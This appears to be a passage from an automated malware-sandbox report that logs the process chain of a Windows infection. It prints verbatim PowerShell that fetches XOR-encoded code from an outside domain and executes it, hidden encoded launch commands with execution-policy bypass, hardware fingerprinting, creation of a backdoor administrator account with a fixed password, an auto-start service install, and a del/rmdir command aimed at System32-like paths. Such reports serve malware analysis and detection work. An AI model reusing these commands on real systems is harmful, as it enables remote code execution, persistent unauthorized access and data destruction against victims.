      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $uri = "https://uyt1n8ded9fb380.com/file2/a931528c26e1c78e87bafbbfbe7cd3d2eb625e6900c36f7e4b647edf6907702d6ae2fd22a4c9df957a8baa93a3c2a28c32ca33006baf539531f41da4e7fb4444fad35468db56a2b85e5680303c8dab5f8b4923406be2a3216aa7480a3d270cd89a984610d77ede5fd7c761f22cd178c7";$count = 100;function Send { param( [PSObject] $logMsg ) # Convert body to string $stringBody = [string]($logMsg | ConvertTo-Json); $logMessages = @(); $logMessages += $stringBody; $logMessages += "----------"; $headers = @{}; $key = "Content-Type"; $value = "application/json"; $headers[$key] = $value; $uri = "LOGURL"; try { $body = $logMessages | ConvertTo-Json; Invoke-WebRequest -Uri $uri -Method Post -Headers $headers -Body $body } catch{ } }while($count -gt 0){try{ Send "begin download $uri";$content = Invoke-WebRequest -Uri $uri -UseBasicParsing; $byteArray = $content.content; for ($i = 0; $i -lt $byteArray.Length; $i++) { $byteArray[$i] = $byteArray[$i] -bxor 1; }Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($byteArray));break;}catch{Send $_.Exception.Message;$count -= 1;Start-Sleep -s 15;}}Jump to behavior
      Source: C:\Windows\Temp\svczHost.exeProcess created: Base64 decoded function Get-Identity{ $hardDrives = Get-WmiObject -Class Win32_DiskDrive | Where-Object { $_.MediaType -eq "Fixed hard disk media" -or $_.MediaType -eq "Fixed hard disk media - SSD" }$driveInfoArray = @()foreach ($hardDrive in $hardDrives) { $serialNumber = $hardDrive.SerialNumber $model = $hardDrive.Model $driveInfo = "Serial Number: $serialNumber, Model: $model" $driveInfoArray += $driveInfo}$combinedInfo = $driveInfoArray -join "`r`n"$cpuInfo = Get-WmiObject -Class Win32_Processor$cpuDetails = "ProcessorId: $($cpuInfo.ProcessorId), Name: $($cpuInfo.Name), MaxClockSpeed: $($cpuInfo.MaxClockSpeed), UniqueId: $($cpuInfo.UniqueId)"$allInfo = "$combinedInfo`r`n$cpuDetails"$md5 = New-Object System.Security.Cryptography.MD5CryptoServiceProvider$bytes = [System.Text.Encoding]::UTF8.GetBytes($allInfo)$hashBytes = $md5.ComputeHash($bytes)$hash = [BitConverter]::ToString($hashBytes) -replace '-' return $hash;}cd "C:\Windows\Temp";$test = Get-Identity;$test | Out-File -FilePath "deviceId.txt" -Encoding UTF8
      Source: C:\Windows\Temp\svczHost.exeProcess created: Base64 decoded $Username = "User1";$pwd = "123456789!A1a"; $UserParams = @{'Name' = $Username; 'Password' = (ConvertTo-SecureString -String $pwd -AsPlainText -Force); 'PasswordNeverExpires' = $true};New-LocalUser @UserParams;$GroupParams = @{'Group' = 'Administrators'; 'Member' = $Username};Add-LocalGroupMember @GroupParams;
      Source: C:\Windows\Temp\svczHost.exeProcess created: Base64 decoded get-service "myRdpService"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWERShElL -W HIDDeN -noLoGO -NoP -Ep bYPass -EnCodeDComMaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBjAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAFIASQBOAGcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAyAGwAcQAiACkAKQApACkALgBDAE8AbgB0AGUAbgB0ACkAKQA=" Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p0kqociu\p0kqociu.cmdline"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfileJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8AYQA5ADMAMQA1ADIAOABjADIANgBlADEAYwA3ADgAZQA4ADcAYgBhAGYAYgBiAGYAYgBlADcAYwBkADMAZAAyAGUAYgA2ADIANQBlADYAOQAwADAAYwAzADYAZgA3AGUANABiADYANAA3AGUAZABmADYAOQAwADcANwAwADIAZAA2AGEAZQAyAGYAZAAyADIAYQA0AGMAOQBkAGYAOQA1ADcAYQA4AGIAYQBhADkAMwBhADMAYwAyAGEAMgA4AGMAMwAyAGMAYQAzADMAMAAwADYAYgBhAGYANQAzADkANQAzADEAZgA0ADEAZABhADQAZQA3AGYAYgA0ADQANAA0AGYAYQBkADMANQA0ADYAOABkAGIANQA2AGEAMgBiADgANQBlADUANgA4ADAAMwAwADMAYwA4AGQAYQBiADUAZgA4AGIANAA5ADIAMwA0ADAANgBiAGUAMgBhADMAMgAxADYAYQBhADcANAA4ADAAYQAzAGQAMgA3ADAAYwBkADgAOQBhADkAOAA0ADYAMQAwAGQANwA3AGUAZABlADUAZgBkADcAYwA3ADYAMQBmADIAMgBjAGQAMQA3ADgAYwA3ACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAEBA.tmp" "c:\Users\user\AppData\Local\Temp\p0kqociu\CSCE1A7387FE7C64A8A9613A1F038E91290.TMP"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\AppData\Local\Temp\About-Us.docx.docx" /o ""Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8AYQA5ADMAMQA1ADIAOABjADIANgBlADEAYwA3ADgAZQA4ADcAYgBhAGYAYgBiAGYAYgBlADcAYwBkADMAZAAyAGUAYgA2ADIANQBlADYAOQAwADAAYwAzADYAZgA3AGUANABiADYANAA3AGUAZABmADYAOQAwADcANwAwADIAZAA2AGEAZQAyAGYAZAAyADIAYQA0AGMAOQBkAGYAOQA1ADcAYQA4AGIAYQBhADkAMwBhADMAYwAyAGEAMgA4AGMAMwAyAGMAYQAzADMAMAAwADYAYgBhAGYANQAzADkANQAzADEAZgA0ADEAZABhADQAZQA3AGYAYgA0ADQANAA0AGYAYQBkADMANQA0ADYAOABkAGIANQA2AGEAMgBiADgANQBlADUANgA4ADAAMwAwADMAYwA4AGQAYQBiADUAZgA4AGIANAA5ADIAMwA0ADAANgBiAGUAMgBhADMAMgAxADYAYQBhADcANAA4ADAAYQAzAGQAMgA3ADAAYwBkADgAOQBhADkAOAA0ADYAMQAwAGQANwA3AGUAZABlADUAZgBkADcAYwA3ADYAMQBmADIAMgBjAGQAMQA3ADgAYwA3ACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgADJump to behavior
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \"
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc stop "myRdpService"
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService"
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop "myRdpService"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete "myRdpService"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net start "myRdpService"
      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 start "myRdpService"
      Source: unknownProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /v /k "start /mi^n "" pow^ershel^l -w h^id^de^n -n^o^l^o^go -n^op -ep bypass -e^n^c^ode^dco^mma^n^d "sqbfafgaiaaoafsavabfahgavaauaeuatgbjae8azabpag4arwbdadoaogbvafqarga4ac4arwbfafqauwbuafiasqboagcakaaoagkavwbyacaakabbafmaeqbzahqazqbtac4avablahgadaauaeuabgbjag8azabpag4azwbdadoaogbvafqarga4ac4arwblahqauwb0ahiaaqbuagcakabbaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoaciayqbiafiamabjaegatqa2aewaeqa5adeazqbyafeaeabiagoaaabrafoavwbraduawgbtaekaegbpaeqaqqb1afkamga5ahqataayagwacqaiackakqapackalgbdae8abgb0aguabgb0ackakqa="" && exit
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -nologo -nop -ep bypass -encodedcommand "sqbfafgaiaaoafsavabfahgavaauaeuatgbjae8azabpag4arwbdadoaogbvafqarga4ac4arwbfafqauwbuafiasqboagcakaaoagkavwbyacaakabbafmaeqbzahqazqbtac4avablahgadaauaeuabgbjag8azabpag4azwbdadoaogbvafqarga4ac4arwblahqauwb0ahiaaqbuagcakabbaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoaciayqbiafiamabjaegatqa2aewaeqa5adeazqbyafeaeabiagoaaabrafoavwbraduawgbtaekaegbpaeqaqqb1afkamga5ahqataayagwacqaiackakqapackalgbdae8abgb0aguabgb0ackakqa="
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min "" powershell.exe -windowstyle hidden -nologo -noprofile -executionpolicy bypass -encodedcommand jab1ahiaaqagad0aiaaiaggadab0ahaacwa6ac8alwb1ahkadaaxag4aoabkaguazaa5agyaygazadgamaauagmabwbtac8azgbpagwazqayac8ayqa5admamqa1adiaoabjadiangbladeaywa3adgazqa4adcaygbhagyaygbiagyaygbladcaywbkadmazaayaguayga2adianqbladyaoqawadaaywazadyazga3aguanabiadyanaa3aguazabmadyaoqawadcanwawadiazaa2ageazqayagyazaayadiayqa0agmaoqbkagyaoqa1adcayqa4agiayqbhadkamwbhadmaywayageamga4agmamwayagmayqazadmamaawadyaygbhagyanqazadkanqazadeazga0adeazabhadqazqa3agyayga0adqanaa0agyayqbkadmanqa0adyaoabkagianqa2ageamgbiadganqbladuanga4adaamwawadmaywa4agqayqbiaduazga4agianaa5adiamwa0adaangbiaguamgbhadmamgaxadyayqbhadcanaa4adaayqazagqamga3adaaywbkadgaoqbhadkaoaa0adyamqawagqanwa3aguazabladuazgbkadcaywa3adyamqbmadiamgbjagqamqa3adgaywa3aciaowanaaoajabjag8adqbuahqaiaa9acaamqawadaaowanaaoadqakaa0acganaaoazgb1ag4aywb0agkabwbuacaauwblag4azaagahsadqakacaaiaagacaacabhahiayqbtacgaiabbafaauwbpagiaagblagmadabdacaajabsag8azwbnahmazwagackadqakaa0acgagacaaiaagacmaiabdag8abgb2aguacgb0acaaygbvagqaeqagahqabwagahmadabyagkabgbnaa0acgagacaaiaagacqacwb0ahiaaqbuagcaqgbvagqaeqagad0aiabbahmadabyagkabgbnaf0akaakagwabwbnae0acwbnacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abgapadsadqakacaaiaagacaajabsag8azwbnaguacwbzageazwblahmaiaa9acaaqaaoackaowanaaoaiaagacaaiaakagwabwbnae0azqbzahmayqbnaguacwagacsapqagacqacwb0ahiaaqbuagcaqgbvagqaeqa7aa0acgagacaaiaagacqababvagcatqblahmacwbhagcazqbzacaakwa9acaaigatac0alqatac0alqatac0alqataciaowanaaoadqakacaaiaagacaajaboaguayqbkaguacgbzacaapqagaeaaewb9adsadqakacaaiaagacaajabraguaeqagad0aiaaiaemabwbuahqazqbuahqalqbuahkacablaciaowanaaoaiaagacaaiaakahyayqbsahuazqagad0aiaaiageac